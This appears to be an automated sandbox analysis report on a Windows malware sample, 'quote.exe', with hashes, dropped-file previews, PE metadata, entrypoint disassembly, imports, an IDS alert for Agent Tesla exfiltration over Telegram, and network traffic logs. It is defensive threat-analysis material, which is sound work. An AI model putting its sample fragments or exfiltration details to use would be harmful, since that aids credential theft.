                                                                            SecuriteInfo.com.W32.AIDetect.malware2.25291.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            0537ad6114d4d06198c6ddcf3d07de3a.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            cfd8119daff52eae6c8e0e71934fa324.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            3a574e40c22ea04803e324ebfb59316b.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Variant.Lazy.232996.32649.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            beaf75c1fd0f00523371b12f704f58e0.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            e15613de4e2a0a21fc63057f9a39bb12.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            4e889b05b0f9a5932103989a5b045630.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            655523ac84dff4d042b4ef8c8cc0ee22.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            fc827c238cf5a48ab0f214befddc5a19.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            37f463bf4616ecd445d4a1937da06e19YujVKQYYca_Quotes_pdf.jsGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            TRANSFERENCIA-52910.00.jsGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            JPosaWorkst .exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            JPosaWorkst .exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            https://docs.google.com/presentation/d/1bSeUBxyr_bCkSKrFu9BnX-cyqKyR4xNw2rfkPYiZBYs/pubGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            Payment Advice 1012330.xlsxGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            emYbkeMv3n.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            mAcZfVObJ3.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            SOA Shenzhen HO International Logistics Co.xlsxGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            Purchase order.xlsxGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            New Order Requirement.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            bCl314fp0e.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            SOA.xlsxGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            1JcCkNxKB4.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            cF8jYYa5X9.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            kIu9j6WuTA.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            c8ym8UXtAv.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            uQB2wLdRz8.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            FZnzYAzGv9.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            Py6slXCa5J.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dllquote.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exeGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exeGet hashmaliciousBrowse
                                                                                  C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195\lang-1038.dllquote.exeGet hashmaliciousBrowse
                                                                                    Process:C:\Users\user\Desktop\quote.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30162
                                                                                    Entropy (8bit):3.9991727403725434
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:vPTWKQPDFDa9jj4F5fiUmZbVA5v0Lxlg56qTArhBPh4fE:vPTB4D2W5qUmZbVA5CxlxBPafE
                                                                                    MD5:A83EC7AA6CC596DFBFA54B05FE5A132D
                                                                                    SHA1:5630B96C9660A79D0BEAD38435419FAFF3B8C7D5
                                                                                    SHA-256:DB510627377AC3C3C34057BEBBEC00EA7C90493D8C7D5052E7762FC2466E822C
                                                                                    SHA-512:E601EB7305C48461026F205FBA6D74DC3CF4910DFFA837AACC11DF89ACF9DEF2F6D37AFDD6C715A8DDD46A5A8DC4DB133DF9277171A97FF0DFC6223904B6A7D6
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:A63A05B4B060717809B1D8C59228B01359479F6CD4E88030C54D8BC88E22BF4C8913A7CAC3EA32D5CE9C148934B11E00F4A8041E87C656FE036F6FC6563A0AC03AB547758D2A64BDCF903498CC4824FB9F73B10FF00ED26C16FFEFE62CE33F810CE597EC27905297D3BF8A703C8378C2E1E64AD2A615AF759BB94030B25373B130923B2BFBB1AD35A3A5953566F480524446B6B977FCD1E58DE23B82FC64E31D0D521D3C7F7810E144E863FF3D575EC0777276097144822B424632E62CC4438C64A693A50F79533195570DFDDAD075906819010F81482527917FE1B682C753303E9CCDB1D47472EB5D5B7D7B98674C287DDF2BC6B2EF370DAAF23ECB162146EEFFD4B8FF497EB9433F6430E500973573B7CC3035781632DF320DE53AA4906422D342FF8B6751FDC9E11A7148D1BE2CCED0F87009E4682D445D1C5FE9A5E2F35A57E6F1E3E1903E905B005FFDC2C1B97AF1C4873F5EF4959C045C7CF8D8F3E288E94574C5A087FA2DC10D2F400F4EBC7428350436C9A58399B162DC8BF922ABBB7D0E4EBEE6625BF06B377C7973A88E620E8A24CDAA4EE21F5F45BAF5E3882B51F9CAFF7EA5D394F2ECDABB6DD18D0C34D37C1855D3E7DDF7F8EDA91D8D182CB1C1E1E2598AC8311872E04881C6055CF34401395FC6838D67B76ADF4F54C437D652DE13885F43A19563EBA77ADBC1D93FB9D8641C
                                                                                    Process:C:\Users\user\Desktop\quote.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):170504
                                                                                    Entropy (8bit):3.8894730756626315
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:WAk2jlc69HieVvyQfEJfA4aHUf8pgFjQzrDJsU+Lewl8w0i8KEdrMFMJgMER+d/r:XPpTrL
                                                                                    MD5:30A4654EF838936FAAD8E3532EA3B9A4
                                                                                    SHA1:75B30B63B130496FFAE16256FB49924C551B122D
                                                                                    SHA-256:1D8585F60A4100CBA595A7AAD3C0A71785D9F66C05F9DB1FAE8C63C0AE5CDB0D
                                                                                    SHA-512:9F121B3F71385613ACFA1E082161EB85FA81D0EC0161623EE7AE12AA6FA978284B0703BF9EDFD5F9310F3299D7A4D0566721E429714C73C14993ABAB60E8363A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: quote.exe, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!.........x.......................................................T....@.......................................... ...t...........z... ...........................................................................................rdata..p...........................@..@.rsrc....t... ...v..................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...S...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\quote.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):93683
                                                                                    Entropy (8bit):7.319977882057591
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:+91i7REPKW6BTCUbRL6nWeAxY00OgJJ9ibRZS7Je/PCKKJVv2CpUo954PaIN32b1:GcWKW6NrRL6Sv0OHbS0aKKzeCpUY54i
                                                                                    MD5:BDF34E6C170FD1646074A60B0CF7434F
                                                                                    SHA1:F3B798980682417A06B388E2AF97A66A51E052E7
                                                                                    SHA-256:3187AFD39C3DDEF8E8357CD99CA06114293BBFA97EF86EF190C5C0CCD572A443
                                                                                    SHA-512:D624A08038A817B150A52F92EA65911BE93E2D37754784DF8CB57E88C7FB5C01745943E98EF451C381629DBC57A95A87FB3E13EB5D788DBAD3637BAF3419A72F
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...%fN.\...X........h.H...$..V.me..k.... ..D.......K..&.7..11g..`>.haqR,9./<....$.S.R..q.g....BU^=.d...j6.q....{g..Q........\L...............&.....yu.b...%....q.h..3......S..M:]V.m.u..y.3G.F.,>%F.!9.d....l..%Y...BBmD..h.GvtN.?.Z-..]...+H5\`.>b1..7..H....Q..I...s......./..........\e...E.\F..eQ-r.......$.6.c....uu.....8...(......>.j......Z.ZA.....A^...?.B'1.VZ..0...o..9..aPv........\.z.....Wa.......<D.U$j.%.}'....$<...X$..H.N..\.aD.e+.G...:e...N....Tn.~:....=..e..C....`.........}...(....g....}E.`~&ab@.)i).[..K.Vr".Y...._.4....3........~.......)..:...|...........Y.RFW....N......Y..]^..2..].T..v.h.....H..6..L).n..1.p....?m.\...(5...b.|..)....3....$....;7x.<E+....w.S.\......;...J....4.o.3[wp=../q....i.|.P..f.......+[....*...%..N..%O.....y../=...eb......:.xap.f../.B...k1v3S....d...%pr..}.'F.,.+....I.W.......ZG..O.........m$&.i.iM+.%t........Tp....V..i..F....MP....>.H.N{P..kX.H=3....n...T......3x...\..a.H.-.L..R"K!....l.N......y.~..[!
                                                                                    Process:C:\Users\user\Desktop\quote.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):5.737465490490623
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:uenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBUIwL:u8+Qlt70Fj/lQRY/9Vjj+L
                                                                                    MD5:A1DA6788AEAF78CA4AE1DECE8019E49D
                                                                                    SHA1:D770155E6E9AA69223BE198C44A8DA26A1756D89
                                                                                    SHA-256:B7823A15E7B1866BA3D77248F750B66505859D264CFC39D8C8C5E812F8AE4A81
                                                                                    SHA-512:EADA9C1528563DDFE3D4D8ED5DBC52B85A9190765535B68DA90E6D623288BF0090ADAC5118E1ED6E3CB3E0ABB9AF025D3A2A73121413A4471A90FD04BC861E18
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: quote.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):3.964735178725505
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                    MD5:9F754B47B351EF0FC32527B541420595
                                                                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                    Malicious:false
                                                                                    Preview:NordVPN directory not found!..
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.832059443574815
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:quote.exe
                                                                                    File size:183096
                                                                                    MD5:016eaf77df40f3bea1aab54078a6c7a8
                                                                                    SHA1:7316ae0f00a564f246fa4c40512844fc9181e691
                                                                                    SHA256:185b5f59975f52135981264900e89f09492956426ef0d309d0407c381b76a622
                                                                                    SHA512:605da65c91e5af1d825397f95944348602839e1196754f03766473e53040f5b48e7bde7c369f32bc66ca2fc18e1bae77a38e32779f4792ffa2243bda03c4e7ca
                                                                                    SSDEEP:3072:HNRCywDw1DiJkusvbVEDws7Qnm03JiAf9RHrettxdLJixg5xKijrNDeQz:HT4DtAVEDN7B03JiQ9YttxvKijrwQz
                                                                                    TLSH:500402120671C277D1E205301A367BABBEF79A160650AF0727A06F9CBF22791DD1F74A
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................h.........
                                                                                    Icon Hash:74d4c4d8e8f0ccd4
                                                                                    Entrypoint:0x4034c5
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5F24A9CD [Fri Jul 31 23:31:25 2020 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN="Nasturtion euchromosome ", OU="Forretningsnavnene Surliest Countercross ", E=Eleverne@Khatti.Syn, O=Pseudomonotropy, L=Rouilly-Sacey, S=Grand Est, C=FR
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 19/09/2021 20:37:01 18/09/2024 20:37:01
                                                                                    Subject Chain
                                                                                    • CN="Nasturtion euchromosome ", OU="Forretningsnavnene Surliest Countercross ", E=Eleverne@Khatti.Syn, O=Pseudomonotropy, L=Rouilly-Sacey, S=Grand Est, C=FR
                                                                                    Version:3
                                                                                    Thumbprint MD5:A89CF9109371E27EDC8A968A26E8FCAA
                                                                                    Thumbprint SHA-1:6255643C3F031C414228A9EB506C93A8428E9445
                                                                                    Thumbprint SHA-256:9D314B3AA4B0817A51E9C7E59200399DB5589792E909A0B72DDFEF8414A7FD25
                                                                                    Serial:76FDDE0DDDC8FCD6
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004080CCh]
                                                                                    call dword ptr [004080D0h]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [00434F0Ch], eax
                                                                                    je 00007FC1ACFED1E3h
                                                                                    push ebx
                                                                                    call 00007FC1ACFF04D1h
                                                                                    cmp eax, ebx
                                                                                    je 00007FC1ACFED1D9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004082B0h
                                                                                    push esi
                                                                                    call 00007FC1ACFF044Bh
                                                                                    push esi
                                                                                    call dword ptr [00408154h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007FC1ACFED1BCh
                                                                                    push 0000000Bh
                                                                                    call 00007FC1ACFF04A4h
                                                                                    push 00000009h
                                                                                    call 00007FC1ACFF049Dh
                                                                                    push 00000007h
                                                                                    mov dword ptr [00434F04h], eax
                                                                                    call 00007FC1ACFF0491h
                                                                                    cmp eax, ebx
                                                                                    je 00007FC1ACFED1E1h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007FC1ACFED1D9h
                                                                                    or byte ptr [00434F0Fh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408038h]
                                                                                    push ebx
                                                                                    call dword ptr [00408298h]
                                                                                    mov dword ptr [00434FD8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0042B228h
                                                                                    call dword ptr [0040818Ch]
                                                                                    push 0040A2C8h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x24a0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x2c3c00x778.data
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x67930x6800False0.6720628004807693data6.495258513279076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x14a40x1600False0.4385653409090909data5.01371465125838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x2b0180x600False0.5240885416666666data4.155579717739458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x360000x380000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x6e0000x24a00x2600False0.686780427631579data6.767580038793957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_BITMAP0x6e2680x368dataEnglishUnited States
                                                                                    RT_ICON0x6e5d00x15a2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                    RT_DIALOG0x6fb780x144dataEnglishUnited States
                                                                                    RT_DIALOG0x6fcc00x13cdataEnglishUnited States
                                                                                    RT_DIALOG0x6fe000x100dataEnglishUnited States
                                                                                    RT_DIALOG0x6ff000x11cdataEnglishUnited States
                                                                                    RT_DIALOG0x700200xc4dataEnglishUnited States
                                                                                    RT_DIALOG0x700e80x60dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x701480x14dataEnglishUnited States
                                                                                    RT_MANIFEST0x701600x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                    DLLImport
                                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    192.168.11.20149.154.167.220497514432851779 08/22/22-01:57:41.268148TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49751443192.168.11.20149.154.167.220
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Aug 22, 2022 01:57:29.105278969 CEST4974880192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.114345074 CEST8049748162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.114518881 CEST4974880192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.115483046 CEST4974880192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.124551058 CEST8049748162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.130024910 CEST8049748162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.130220890 CEST4974880192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.134501934 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.134581089 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.134767056 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.153713942 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.153772116 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.197504044 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.197777033 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.331152916 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.331208944 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.331866026 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.332140923 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.337846994 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.378515005 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.598112106 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.598309994 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.598367929 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.598531008 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.598601103 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.598767042 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.598803043 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.598957062 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.599004030 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.599214077 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.599255085 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.599512100 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.599545002 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.599698067 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.599733114 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.599879980 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.599919081 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600127935 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.600164890 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600373030 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.600408077 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600557089 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.600595951 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600821972 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600930929 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.600972891 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.600982904 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.601200104 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.601294994 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.601337910 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.601475000 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.601598024 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.601661921 CEST49749443192.168.11.20162.159.130.233
                                                                                    Aug 22, 2022 01:57:29.601701975 CEST44349749162.159.130.233192.168.11.20
                                                                                    Aug 22, 2022 01:57:29.601851940 CEST49749443192.168.11.20162.159.130.233
